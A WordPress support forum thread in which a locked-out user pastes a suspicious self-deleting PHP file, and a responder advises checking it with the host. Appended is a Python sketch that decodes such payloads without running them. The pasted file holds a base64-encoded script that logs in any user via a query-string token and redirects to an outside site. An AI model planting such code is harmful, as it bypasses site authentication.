• Resolved Celestial Petals

    (@celestial-petals)


    Seems that I can’t get into my site after logging out. I get redirected to my login page, which is a custom login page from a custom login plugin. I wasn’t sure which plugin was doing this until I began disabling them in my file manager one at a time. When I disabled the Wordfence plugin I was able to log in. Is there a conflict between Wordfence & Admin Custom Login by webilizer? Oh, and a deleteme file is generated each time until I disable the WF plugin & log in that way.

    EXAMPLE deleteme file:

    <?php
    /******************************************************************************\
    |*                                                                            *|
    |* All text, code and logic contained herein is copyright by Installatron LLC *|
    |* and is a part of 'the Installatron program' as defined in the Installatron *|
    |* license: http://installatron.com/plugin/eula                               *|
    |*                                                                            *|
    |* THE COPYING OR REPRODUCTION OF ANY TEXT, PROGRAM CODE OR LOGIC CONTAINED   *|
    |* HEREIN IS EXPRESSLY PROHIBITED. VIOLATORS WILL BE PROSECUTED TO THE FULL   *|
    |* EXTENT OF THE LAW.                                                         *|
    |*                                                                            *|
    |* If this license is not clear to you, DO NOT CONTINUE;                      *|
    |* instead, contact Installatron LLC at: [email protected]             *|
    |*                                                                            *|
    \******************************************************************************/
    file_put_contents(dirname(__FILE__)."/wp-content/deleteme.f7b5b5b86eae44ae83d3805d0843c4a3.php", '<?php
    /******************************************************************************\\
    |*                                                                            *|
    |* All text, code and logic contained herein is copyright by Installatron LLC *|
    |* and is a part of \'the Installatron program\' as defined in the Installatron *|
    |* license: http://installatron.com/plugin/eula                               *|
    |*                                                                            *|
    |* THE COPYING OR REPRODUCTION OF ANY TEXT, PROGRAM CODE OR LOGIC CONTAINED   *|
    |* HEREIN IS EXPRESSLY PROHIBITED. VIOLATORS WILL BE PROSECUTED TO THE FULL   *|
    |* EXTENT OF THE LAW.                                                         *|
    |*                                                                            *|
    |* If this license is not clear to you, DO NOT CONTINUE;                      *|
    |* instead, contact Installatron LLC at: [email protected]             *|
    |*                                                                            *|
    \\******************************************************************************/
    eval(base64_decode(\'JGZpbGUgPSggJHAgPSBzdHJwb3MoX19GSUxFX18sIigiKSApPT09IGZhbHNlID8gX19GSUxFX18gOiBzdWJzdHIoX19GSUxFX18sMCwkcCk7aWYgKCF1bmxpbmsoJGZpbGUpKXsJY2htb2QoJGZpbGUsMDc3Nyk7CXVubGluaygkZmlsZSk7fWRlZmluZSgiQUJTUEFUSCIsIGRpcm5hbWUoZGlybmFtZSgkZmlsZSkpLiIvIik7aW5jbHVkZV9vbmNlKEFCU1BBVEguIndwLWNvbmZpZy5waHAiKTtpbmNsdWRlX29uY2UoQUJTUEFUSC4id3AtYWRtaW4vaW5jbHVkZXMvZmlsZS5waHAiKTtpbmNsdWRlX29uY2UoQUJTUEFUSC4id3AtYWRtaW4vaW5jbHVkZXMvcGx1Z2luLnBocCIpO2luY2x1ZGVfb25jZShBQlNQQVRILiJ3cC1hZG1pbi9pbmNsdWRlcy90aGVtZS5waHAiKTtpbmNsdWRlX29uY2UoQUJTUEFUSC4id3AtYWRtaW4vaW5jbHVkZXMvbWlzYy5waHAiKTskayA9IHN1YnN0cigkX1NFUlZFUlsiUVVFUllfU1RSSU5HIl0sMCwzMik7JHUgPSBzdWJzdHIoJF9TRVJWRVJbIlFVRVJZX1NUUklORyJdLDMyKTskaCA9ICR3cGRiLT5nZXRfdmFyKCAkd3BkYi0+cHJlcGFyZSggIlNFTEVDVCB1c2VyX3Bhc3MgRlJPTSB7JHdwZGItPnVzZXJzfSBXSEVSRSBJRCA9ICVzIiwgJHUgKSApO2lmICggaXNfc3RyaW5nKCRoKSAmJiggJGsgPT09IG1kNShta3RpbWUoZGF0ZSgiSCIpLCBkYXRlKCJpIiksIDApLm1kNSgkaCkpICAgICAgICAgICAgICAgICAgICB8fCAkayA9PT0gbWQ1KG1rdGltZShkYXRlKCJIIiksIGRhdGUoImkiKS0xLCAwKS5tZDUoJGgpKSAgICAgICAgICAgICAgICAgICAgfHwgJGsgPT09IG1kNShta3RpbWUoZGF0ZSgiSCIpLCBkYXRlKCJpIikrMSwgMCkubWQ1KCRoKSkgKSl7CXdwX3NldF9hdXRoX2Nvb2tpZSgkdSk7fWhlYWRlcigiTG9jYXRpb246ICIuJ2h0dHA6Ly9tYWdpY2thY2FkZW15LmNvbS93cC1hZG1pbi8nKTs=\'));', LOCK_EX);
Viewing 2 replies - 1 through 2 (of 2 total)
  • Thread Starter Celestial Petals

    (@celestial-petals)

    Is there anyone that can help me with this?

    Hi Celestial,
    I’ve never heard of such a conflict before, but can you try doing the opposite and recheck this issue? I mean disabling “Admin Custom Login” plugin but keeping Wordfence plugin activated.

    Another thing I noticed here is the code in this deleteme file. It looks suspicious. I highly recommend getting back to your hosting provider to ask them why this file is here and ask them about the code at the end of the file. If they didn’t recognize this code, then please follow the instructions mentioned in this article regarding “How to Clean a Hacked WordPress Site using Wordfence”.

    Thanks.
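
A static triage sketch for the kind of file discussed in this thread, added here as an example and not part of either post or of Wordfence: it pulls the argument out of an `eval(base64_decode(...))` call, including the `\'`-escaped form seen in the posted file, and decodes it for reading without executing it. The sample input and the watch-list terms are constructed assumptions.

```python
import base64
import binascii
import re

# Matches eval(base64_decode('...')), including the \' form that appears when
# the call is nested inside a single-quoted PHP string, as in the posted file.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\\?['\"]([A-Za-z0-9+/=\s]+?)\\?['\"]\s*\)\s*\)",
    re.IGNORECASE,
)

# Illustrative watch-list (an assumption, not a Wordfence rule set): calls a
# reviewer would want surfaced when reading a decoded payload.
WATCHLIST = ("wp_set_auth_cookie", "unlink(", "$_SERVER", "include_once", "header(", "eval(")


def extract_payloads(php_source):
    """Return the decoded text of every eval(base64_decode(...)) argument.

    The payload is only decoded for inspection; nothing is executed.
    """
    decoded = []
    for match in EVAL_B64.finditer(php_source):
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64: leave the file for manual review
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def triage(php_source):
    """Pair each decoded payload with the watch-list terms it contains."""
    return [(text, [w for w in WATCHLIST if w in text])
            for text in extract_payloads(php_source)]


# Constructed sample input (not the file from the post).
SAMPLE_PAYLOAD = b'$u = substr($_SERVER["QUERY_STRING"], 32); wp_set_auth_cookie($u);'
SAMPLE = (
    "<?php\nfile_put_contents('x.php', '<?php\n"
    "eval(base64_decode(\\'" + base64.b64encode(SAMPLE_PAYLOAD).decode() + "\\'));', LOCK_EX);\n"
)

if __name__ == "__main__":
    for text, hits in triage(SAMPLE):
        print("flags:", hits)
        print(text)
```

The decoded text and its flags are what to take to the hosting provider when asking whether the file is theirs.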


The topic ‘Locked Out By WF’ is closed to new replies.